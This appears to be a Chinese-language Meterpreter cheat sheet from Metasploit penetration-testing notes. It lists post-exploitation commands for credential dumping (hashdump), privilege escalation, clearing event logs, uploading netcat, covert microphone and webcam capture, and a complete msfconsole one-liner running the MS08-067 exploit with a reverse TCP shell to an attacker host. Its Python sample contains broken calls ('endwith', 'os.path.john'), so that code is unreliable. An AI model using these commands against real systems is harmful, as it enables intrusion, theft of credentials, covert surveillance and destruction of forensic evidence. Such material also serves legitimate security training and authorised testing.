介绍

高级、动态、可扩展的 payload

  • 基于 metepreter 上下文利用更多漏洞发起攻击
  • 后渗透测试阶段一站式操作界面

完全基于内存的 DLL 注入式 payload (不写硬盘)

  • 注入合法系统进程并建立 stager
  • 基于 stager 上传和预加载 dll 进行扩展模块 TLS/1.0 通信隧道
  • 利用 TLS 隧道进一步加载后续扩展模块(避免网络取证)

服务端使用 c 语言编写
客户端提供基于 ruby 的全特性 API(支持任何语言)

使用

  1. Help̵background
  2. Run̵bgrun
  3. Cd ̵ls ̵cat ̵pwd ̵dir ̵mkdir ̵mv ̵rm ̵rmdir ̵edit
  4. lpwd ̵lcd
  5. clearev ̵download ̵
  6. upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
  7. execute -f cmd.exe -i H
  8. getuid ̵getsystem ̵getprivs ̵getproxy ̵getpid
  9. Hashdump ̵run post/windows/gather/hashdump
  10. sysinfo ̵ps ̵kill ̵migrate ̵reboot ̵shutdown ̵shell
  11. show_mount ̵search -f autoexec.bat
  12. arp ̵netstat ̵ipconfig ̵ifconfig ̵route
  13. Idletime ̵resource
  14. record_mic ̵webcam_list ̵webcam_snap -i 1 -v false

扩展

load python
– Help
– python_execute “print (‘asdasdas’)”
– python_execute “import os; cd = os.getcwd()” -r cd
– python_import -f find.py

  1. import os
  2. for root,dirs,files in os.walk("c://"):
  3. for file in files:
  4. if file.endwith(".ini" ) and file.startwith("win"):
  5. print(os.path.john(root,file))

Msfcli

msfconsole -x “use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/ reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit”